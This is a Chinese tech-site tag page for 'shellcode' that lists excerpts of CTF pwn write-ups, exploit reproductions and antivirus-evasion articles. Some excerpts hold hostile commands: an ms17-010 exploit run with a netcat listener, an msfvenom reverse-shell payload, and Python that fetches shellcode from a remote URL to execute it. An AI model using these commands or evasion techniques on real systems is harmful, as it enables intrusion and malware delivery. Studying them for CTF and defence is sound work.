E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
shellcode
2019 红帽杯 three 经验总结
这题感觉要对汇编语言要比较熟悉会更容易做出来…程序逻辑分析:前两个函数通过读取flag文件的内容,并将存放flag的chunk的地址放入bss段中在程序中可以输入3个字节的指令,之后再执行这三个指令,所以目的是植入3个字节的
shellcode
苍崎青子
·
2020-08-24 06:05
PWN
shiyanbar-ropbaby
先看一下文件类型和程序保护开了NX和PIE,栈不可执行和地址随机化,看来不能用
shellcode
了,就像题目提示的用ROP。
吾梦不尽
·
2020-08-24 06:37
jarvisoj level3_x64
ida打开checksec看一下,开启了nx,不想
shellcode
什么的了。
poxlove3
·
2020-08-23 23:32
ms17-010漏洞复现
开始环境靶机为windows7并且存在此漏洞攻击机需要python3环境nc–lvp8888pythonms17-010.py–-host192.168.217.2–-file
shellcode
只需这两条命令
坚强的女程序员
·
2020-08-22 17:14
POC
栈溢出攻击(2)-ROP基础(1)
文章目录预备条件栈溢出ROPret2text程序攻击目标简单fuzz查看保护机制调试程序查看汇编代码确定与返回地址的偏移寻找获取系统shell的代码获取shellret2
shellcode
攻击目标简单fuzz
BurningTeng
·
2020-08-20 06:46
漏洞
网络与安全
Windows开发
root_me_stack_buffer_overflow_basic
ARMpwn简单的栈溢出,就是环境搭建的问题调试出偏移0xa4,发现啥保护没有开,还泄漏了栈地址,就直接ret2
shellcode
了frompwnimport*#p=process(qemu-arm-g1234
doudoudedi
·
2020-08-19 23:13
BUUCTF
题目
XDCTF PWN300&400 Writeup
checksec后发现竟然没有开nx,直接
shellcode
先准备好,放在一边待命。按照国际管理,先
zh_explorer
·
2020-08-19 22:51
pwn
没事撸题
堆栈里的秘密行动:劫持执行流
详情参见:堆栈里的悄悄话——智能指针1神秘的0xCC“去吧,为了首领的伟大理想出发”我是一段二进制代码
shellcode
,0xCC大人精心创造了我,一同诞生的还有一个HTML表单文件小P,我就栖身在小P
编程技术宇宙
·
2020-08-19 22:57
对pwnlibc的学习一
>>>asm('moveax,0')asm()也用于组装
shellcode
(提供的pwntools在shellcraft的模块)>>>asm(shellcraft.nop())拆卸pwnlib.asm.asm
Eternalstay
·
2020-08-19 22:48
pwn学习之ret2libc
原理ret2libc说白了就是让我们之前的ret不往
shellcode
或者vul上跳而是跳到了某个函数的plt或者got的位置从而实现控制程序的函数去执行libc中的函数例子这里使用了wiki上的
菜鸡滴滴~
·
2020-08-19 22:25
短学期自闭赛writeup(一)
,丢到虚拟机中去,file查看是个32位的,然后checksec查看,发现堆栈不可执行,然后用ida查看,反编译一下,然后就看见主函数,发现了主函数的system(bin/sh);然后就知道,连上就有
shellcode
「已注销」
·
2020-08-19 21:40
比赛的writeup
CTF中的PWN——绕NX防护1(本地libc 栈溢出)
NX防护NX是数据与程序的分水岭,栈溢出核心思想是通过局部变量覆盖函数返回地址来修改EIP和注入
Shellcode
,在函数返回时跳到
Shellcode
去执行。
壊壊的诱惑你
·
2020-08-19 21:37
PWN
【渗透测试 在线资源】
OWASP-开放式Web应用程序安全项目OSSTMM-开源安全测试方法手册Shell脚本资源LSST-linuxshell脚本教程Linux资源Kernelnewbies-一个出色的Linux内核资源的社区
Shellcode
weixin_30919429
·
2020-08-19 21:09
操作系统
python
shell
PWN栈溢出
Shellcode
--修改返回地址,让其指向溢出数据中的一段指令根据上面副标题的说明,要完成的任务包括:在溢出数据内包含一段攻击指令,用攻击指令的起始地址覆盖掉返回地址。
Corax_2ven
·
2020-08-19 20:56
PWN
pwn 暑假复习二 简单rop
例一:ret2
shellcode
先复习一下计算与ebp的距离的方法,昨天复习的是用pattern来寻找,今天复习另一种,以ctfwiki的ret2text为例。
SsMing.
·
2020-08-19 19:31
pwn
BUUCTF pwn ez_pz_hackover_2016
0x03IDA 主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入
shellcode
,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。
影子019
·
2020-08-19 18:38
ctf_pwn
buuctf ez_pz_hackover_2016(ret2
shellcode
)
这题和上次的ret2
shellcode
不一样,上次的是返回到bss段,这回是返回到栈上,因为本题给出的是栈的一个地址,所以我们通过计算我们输入进去的
shellcode
对应这个地址的偏移,然后跳到
shellcode
Tower2358
·
2020-08-19 17:15
pwn学习日记Day2 基础知识积累
知识杂项shell-storm.org的
shellcode
数据库使用pwntools库把
shellcode
作为输入传递给程序,尝试使用io.interactive()与程序进行交互,发现可以执行shell
anxiong1803
·
2020-08-19 17:24
CVE-2018-4878 漏洞复现
1.生成
shellcode
msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.8.130lport=8888-fpython>
shellcode
.txtlhost
一个小网工
·
2020-08-19 15:00
笔记
buuctf ciscn_2019_n_5 (ret2
shellcode
)
无保护,程序直接提供了写入bss,ret2
shellcode
一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bssexp:frompwnimport*fromLibcSearcherimport
Tower2358
·
2020-08-19 15:16
shell 实现的自动无限重启脚本,出错自动重启服务
1>forever
shellcode
:#!
李空空
·
2020-08-19 06:02
树莓派RaspberryPI
Linux
溢出程序使用通道对抗防火墙 (转)
可能很多人会想到
shellcode
主动连接,这个如果防火墙做得好的话,不准许访问外部一样不行,即使不考虑这防火墙,而我们自己可能往往处于代理或者透明网关后面,考虑这也是一道难题。
cuiji1279
·
2020-08-19 01:12
Linux
shellcode
编写入门 (转)
blog.csdn.net/littlehedgehog无意当中在安全焦点上面看到的,很入门的一篇文章,不错:原文地址:http://www.xfocus.net/articles/200805/980.html一:什么是
shellcode
yitian20000
·
2020-08-18 23:12
CVE-2015-1641 Office类型混淆漏洞及
shellcode
分析
作者:枕边月亮原文来自:CVE-2015-1641Office类型混淆漏洞及
shellcode
分析0x1实验环境:Win7_32位,Office20070x2工具:Windbg,OD,火绒剑,UltraEdit
张悠悠66
·
2020-08-18 23:18
web安全
MSF 生成静态免杀shell(win)
NO.1利用工具msfmsf全称MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的
shellcode
,
xg_ren
·
2020-08-18 23:41
笔记整理
用Kali Linux动态
shellcode
注入工具:Shellter 4.0 绕过反病毒软件
http://bobao.360.cn/learning/detail/554.html详细介绍:http://drops.wooyun.org/tips/4225用KaliLinux动态
shellcode
那美那美
·
2020-08-18 23:20
乱谈测试
shellcode
中动态定位API
定位API的原理:所有的win_32程序都会加载ntdll.dll和kerner32.dll这两个最基础的动态链接库。如果想要在win_32平台下定位kernel32.dll中的API地址1,首先通过段选择字FS在内存中找到当前的线程环境快TEB。2,线程环境快偏移位置为0x30的地方存放着指向进程环境块PEB的指针。3,进程环境块中偏移位置为0x0C的地方存放着指向PEB_LDR_DATA结构体
whatday
·
2020-08-18 23:40
免杀工具汇总
DKMC项目地址:https://github.com/Mr-Un1k0d3r/DKMC可以创建一个outputs文件夹存放
shellcode
启动pythondkmc.py操作顺序:Sc:是将msf生成的
Micr067
·
2020-08-18 23:18
编写变形的
shellcode
[原理篇]
作为菜鸟,我也好事地下载了一份来看,首先看到的是Plan9大虾的《高级
shellcode
设计技巧》。
weixin_34327761
·
2020-08-18 23:39
教你如何使用分组密码对
shellcode
中的windows api字符串进行加密
本文讲的是教你如何使用分组密码对
shellcode
中的windowsapi字符串进行加密,介绍字符串/模式匹配算法是当前最流行和最简单的检测
shellcode
方法。
weixin_34054866
·
2020-08-18 22:37
shellter介绍
首先需要获取一个正常的Windowsexe可执行文件,然后它会将
shellcode
添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒软件的监测了。
weixin_33941350
·
2020-08-18 22:57
Python编写
shellcode
注入程序
light·2014/12/2911:570x00背景本文为《小学生科普系列》的番外篇,本系列面向小学生,纯科普,大牛莫喷~教程中所有内容仅供学习研究,请勿用于非法用途,否则....我也帮不了你啊...说起注入,大家第一印象可能还习惯性的停留在sql注入,脚本注入(XSS)等。今天light同(jiao)学(shou)带大家从web端回到操作系统,一起探讨Windows下的经典注入——内存注入,使
weixin_33889245
·
2020-08-18 22:19
动态加载
ShellCode
绕过杀软
如果是恶意文件本身包含恶意内容(
ShellCode
),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?
weixin_30790841
·
2020-08-18 22:46
Python exe2
shellcode
,
shellcode
2exe
exe2
shellcode
#!
weixin_30649859
·
2020-08-18 22:37
ShellCode
异或加密去NULL小工具
通常为了简洁及防止NULL产生,
ShellCode
中会使用hash加密。而也有些时候,我们直接使用加密技术去除NULL:#!
weixin_30482181
·
2020-08-18 22:25
shellcode
进行加密原理
对
shellcode
进行加密:#include"stdio.h"charpopup_general[]="\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68
weixin_30457551
·
2020-08-18 22:53
[原创]Python免杀
ShellCode
加载器(Cobaltstrike/Metasploit)
0x001原理采用分离法,即将
ShellCode
和加载器分离。方法较LOW但免杀。本文主要将
ShellCode
转成HEX,再通过加载器执行
ShellCode
。
weixin_30432179
·
2020-08-18 22:21
Python 执行
shellcode
importurllib2importctypesimportbase64#从我们的web服务器上下载
shellcode
url="http://rinige.com/
shellcode
.bin"response
weixin_30298497
·
2020-08-18 22:12
基本
shellcode
提取方法
转载请注明出处:http://blog.csdn.net/wangxiaolong_china这里,我们将编写一个非常简单的
shellcode
,它的功能是得到一个命令行。
elite
·
2020-08-18 22:03
缓冲区溢出
shellcode
API的自动定位
1.背景知识补充在使用
shellcode
的时候有个很大的问题就是动态定位API,下面这段代码介绍的是利用PE结构来寻址API的方法。
u200915331
·
2020-08-18 22:43
网络安全
红蓝对抗之如何利用
Shellcode
来躲避安全检测
Shellcode
注入或
Shellcode
执行往往是我们在目标系统上实现Payload
墨痕诉清风
·
2020-08-18 22:08
C调用
shellcode
方法总结
1、
shellcode
定义:
shellcode
是一段用于利用软件漏洞而执行的代码,
shellcode
为16进制的机器码,因为经常让攻击者获得shell而得名。
shellcode
常常使用机器语言编写。
司徒荆
·
2020-08-18 22:36
C/C++
shellcode
加密过杀软
前提准备环境准备:Windows732位系统
Shellcode
使用kalilinuxMetasploit生成
shellcode
Windows7需要安装的软件:Python2.7pipinstallpyinstallerpipinstallpywin32VCForPython27
明月清水
·
2020-08-18 22:05
渗透之路
经验分享
python
shellcode
模板
shellcode
一直都是漏洞利用关键的一环,关于
shellcode
怎么编写网上已经有很多优秀的文章,对于利用空间有限的漏洞,往往需要自己精心设计
shellcode
利用每一个字节的空间,而当漏洞有足够空间让我们发挥的时候再去一条条用汇编设计显然有点效率不足了
QQQqQqqqqrrrr
·
2020-08-18 21:39
Windows编程技术
Shellcode
的生成和利用
构造
shellcode
是CTF-PWN和渗透当中经常需要进行的一项活动,有合适熟练的构造
shellcode
的方法途径,可以使得pwn的过程更加流畅和舒服。
Fasthand_
·
2020-08-18 21:50
CTF
Pwn
信息安全
执行
shellcode
的几种方式
首先写出汇编成功弹出计算器#pragmacomment(linker,"/section:.data,RWE")//data段可读写#pragmacomment(linker,"/subsystem:\"windows\"/entry:\"mainCRTStartup\"")//不显示窗口#pragmacomment(linker,"/INCREMENTAL:NO")//指定非增量编译#inclu
go0dStudy
·
2020-08-18 21:55
shellcode
shellter免杀
Shellter简介Shellter是一个动态的
shellcode
注入工具,是第一个真正动态的PEinfector创建的。
a阿飞
·
2020-08-18 21:51
网络安全
好好说话之ret2
shellcode
本题为ret2
shellcode
-example题目路径/ctf-challenges/pwn/stackoverflow/ret2
shellcode
/ret2
shellcode
-example一、原理
hollk
·
2020-08-18 21:47
pwn
如何写一个
shellcode
什么样的
shellcode
可以起到最大的破坏,那就是能够满足攻击者各种各样需要的
shellcode
,怎么才能满足各种各样的需要呢?调用shell。
hhhnoone
·
2020-08-18 21:10
漏洞
shellcode
编写
1.前言漏洞利用最重要的就是
shellcode
的编写,漏洞发现者在漏洞发现之初并不会给出完整的
shellcode
,所以我们要学会自己编写
shellcode
。
一梦不醒
·
2020-08-18 21:49
上一页
5
6
7
8
9
10
11
12
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他